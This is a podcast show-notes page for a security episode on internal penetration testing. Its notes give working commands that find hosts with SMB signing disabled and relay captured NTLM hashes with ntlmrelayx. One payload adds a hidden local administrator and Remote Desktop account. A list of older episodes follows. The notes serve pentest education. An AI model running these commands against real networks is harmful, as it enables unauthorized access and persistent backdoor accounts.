7MS #372: Tales of Internal Pentest Pwnage - Part 5
7 Minute Security15 Heinä 2019

7MS #372: Tales of Internal Pentest Pwnage - Part 5

Today's episode is brought to you by ITProTV. It's never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute

Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode:

  • Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this:
opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt

Source: Pwning internal networks automagically

  • Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget:
net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add

So the full command would be:

ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add'

Check today's show notes at https://7ms.us for more information!

Jaksot(720)

7MS #271: Patching Solutions Bake-Off - Part 1

7MS #271: Patching Solutions Bake-Off - Part 1

Seems like every business I meet with needs some sort of help in the patching department. Maybe they've got the Microsoft OS side of the house under control, but the third-party stuff is lacking. Or v...

10 Elo 201710min

7MS #270: IDS on a Budget - Part 4

7MS #270: IDS on a Budget - Part 4

I spent a bunch of time with Security Onion the last couple week's and have been lovin' it! I ran the install, took all the defaults, ran the updates, and pretty much just let it burn in on my prod (h...

3 Elo 201712min

7MS #269: Documentation

7MS #269: Documentation

Documentation is super boring, right? Yet it's critical to getting your client/audience excited about making their security better! In this episode I talk about my mixed feelings towards the "big" sta...

27 Heinä 201713min

7MS #268: IDS on a Budget - Part 3

7MS #268: IDS on a Budget - Part 3

Been having a blast working with the beta branch of the Sweet Security project and it anxious to try the latest fixes of the beta branch. Give it a look! I also spent a lot of time the last few nights...

19 Heinä 201712min

7MS #267: Backup Disasters

7MS #267: Backup Disasters

Today's episode is a horror story about how I recently lost 5+ years of CrashPlan backups due to what I'm calling a...small clerical error. Yes, this oopsie was 100% my fault, but I think backup provi...

18 Heinä 201711min

7MS #266: IDS on a Budget - Part 2

7MS #266: IDS on a Budget - Part 2

This week I've continued to play with the awesome Sweet Security IDS solution you can throw on a Raspberry Pi 3. A big update to share is that there is a beta branch which has some cool new features, ...

13 Heinä 201710min

7MS 265: IDS on a Budget - Part 1

7MS 265: IDS on a Budget - Part 1

I've been wanting to get a Bro IDS installed for a long time now - and for several reasons: It looks fun! My customers have expressed interest It will be part of my upcoming ILTACON session. S...

5 Heinä 201710min

7MS #264: Hacking Wordpress

7MS #264: Hacking Wordpress

I was pleasantly surprised to see a Wordpress site fall into a pentest scope this past week. One helpful tool to get familiar with when attacking Wordpress sites is wpscan, which is built right into K...

29 Kesä 201711min

Suosittua kategoriassa Politiikka ja uutiset

uutiscast
aikalisa
politiikan-puskaradio
rss-ootsa-kuullut-tasta
ootsa-kuullut-tasta-2
tervo-halme
rss-podme-livebox
rss-pinnalla
rss-ulkopoditiikkaa
aihe
the-ulkopolitist
viisupodi
otetaan-yhdet
et-sa-noin-voi-sanoo-esittaa
rss-vaalirankkurit-podcast
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
rss-asiastudio
rss-kaikki-uusiksi
rss-toisten-taskuilla
rss-girls-finish-f1rst